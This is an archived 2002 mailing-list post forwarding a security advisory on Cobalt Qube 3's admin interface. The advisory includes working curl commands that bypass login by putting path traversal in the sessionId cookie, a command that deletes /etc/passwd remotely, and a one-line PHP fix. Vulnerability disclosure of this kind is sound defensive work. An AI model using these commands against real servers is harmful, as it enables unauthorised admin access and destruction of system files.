[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] Fwd: Cobalt Qube 3 Administration page vulnerability
- Subject: [cobalt-security] Fwd: Cobalt Qube 3 Administration page vulnerability
- From: Michael Stauber <cobalt@xxxxxxxxxxxxxx>
- Date: Wed, 24 Jul 2002 19:44:07 +0200
- Organization: SOLARSPEED.NET
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
---------- Forwarded Message ----------
Subject: Cobalt Qube 3 Administration page
Date: Wed, 24 Jul 2002 09:40:01 +0800
From: pokley <saleh@xxxxxxxxxxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx, sk <sk@xxxxxxxxxxxxxxxxxxx>, Shaharil Abdul
Malek <shaharil@xxxxxxxxxxxxxxxxxxx>
SCAN Associates Sdn Bhd Security Advisory
Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel)Kernel 2.2.16C7 on
an i586)
Date: 23rd July 2002
Summary: By pass login
Author: pokleyzz <pokleyzz@xxxxxxxxxxxxxxxxxxx>, sk <sk@xxxxxxxxxxxxxxxxxxx>,
shaharil <shaharil@xxxxxxxxxxxxxxxxxxx>
Description
===========
First of all, we would like to thank you Sun Microsystem (Malaysia) for
sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the
Flag Security Conference on 16-17 July 2002. Being the winner, we are proud
to receive this cool box. After playing around for awhile, we found several
problems in Cobalt Qube 3 System Management. The most serious bug may allow
remote access as Admin. We have alerted security-alert@xxxxxxx and Sun
Microsystem (Malaysia) on 19th July but unfortunately we did not receive any
feedback.
Details
=======
Problem 1: Local Privilege Escalation to Admin
Any user with ability to create file in any location of a Cobalt server will
be able to promote to Admin access of the System Management. A user may
create a file in /tmp/test and crafted a cookie to login as Admin without
password:
Create dummy session file in Cobalt server:
$ printf "admin" > /tmp/test
Login without password from anywhere:
$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
Problem 2: Remote User access
We also found out that if the User account is newly created, we can bypass
the authentication without a need to create dummy session file in the
server:
$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
Problem 3: Remotely delete file
It is possible to delete file from the server by specifying the path to the
file and the first 31 characters of the file. The following example will
delete the /etc/passwd file from the server:
$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root
:/bin/bash http://192.168.0.1:444/splashAdmin.php
Quick Solution
==============
/usr/sausalito/ui/libPhp/ServerScriptHelper.php
line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);
* - curl can be download from http://curl.haxx.se/download.html
www.scan-associates.net
-------------------------------------------------------